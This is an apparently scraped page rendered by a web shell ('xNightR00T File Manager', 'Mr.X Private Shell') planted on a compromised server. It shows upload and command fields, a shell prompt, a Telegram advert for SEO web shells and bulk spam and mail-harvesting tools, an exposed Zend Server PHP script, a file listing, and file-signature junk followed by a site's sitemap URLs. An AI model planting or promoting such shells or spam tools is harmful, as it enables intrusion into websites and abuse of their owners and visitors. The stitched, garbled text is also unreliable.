xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

ini_set("display_errors", 0);

require_once __DIR__ . DIRECTORY_SEPARATOR . 'zsd_common.php';

/**
 * Contains the information about an extension
 */
class ExtensionInfo {
    public $name;
    public $version;
    public $licensed;

    function __construct($name, $version, $licensed = NULL) {
        $this->name = $name;
        $this->version = $version;
        if(!is_null($licensed)) {
            $this->licensed = $licensed;
        }
    }
}

/**
 * @brief return a JSON representaion of all loaded extesnion
 * @returns string JSON string
 */
function printLoadedExtensions() {
    $result = array();
    $phpExtensions  = get_loaded_extensions();
    $zendExtensions = get_loaded_extensions(TRUE);

    $allExtensions  = array_unique( array_merge($phpExtensions, $zendExtensions) );
    foreach($allExtensions as $extension) {
        if ( $extension == "apc" && ini_get('apc.shm_size') === FALSE ) {
            // Fake APC
            $extension = "APC Compatibility Layer";
        }

        $ver = phpversion($extension);
        if( !$ver ) {
            $ver = "null";
        }

        if (function_exists( 'zem_get_extension_info_by_name')) {
            $zem_extension_info = zem_get_extension_info_by_name($extension);
        }

        if ($zem_extension_info !== false) {
            if (isset($zem_extension_info['is_loaded'])) {
                $result[] = new ExtensionInfo($extension, $ver, $zem_extension_info['is_licensed']);
            }
        } else {
            $result[] = new ExtensionInfo($extension, $ver, true);
        }
    }

    return $result;
}
header('Content-Type: application/json');
echo json_encode(printLoadedExtensions());

Filemanager

Name Type Size Permission Actions
zsd_clean_cache.php File 2.68 KB 0644
zsd_common.php File 539 B 0644
zsd_datacache_clear_ns.php File 639 B 0644
zsd_datacache_delete_entry.php File 641 B 0644
zsd_dc_print_shm_info.php File 153 B 0644
zsd_get_directive_value.php File 730 B 0644
zsd_hash_sign.php File 1.69 KB 0644
zsd_is_webserver_alive.php File 106 B 0644
zsd_loaded_modules.php File 314 B 0644
zsd_node_profile.php File 1003 B 0644
zsd_pagecache_clean.php File 1 KB 0644
zsd_php_info.php File 1.66 KB 0644
zsd_phpver.php File 217 B 0644
zsd_print_directives.php File 979 B 0644
zsd_print_extensions.php File 1.65 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml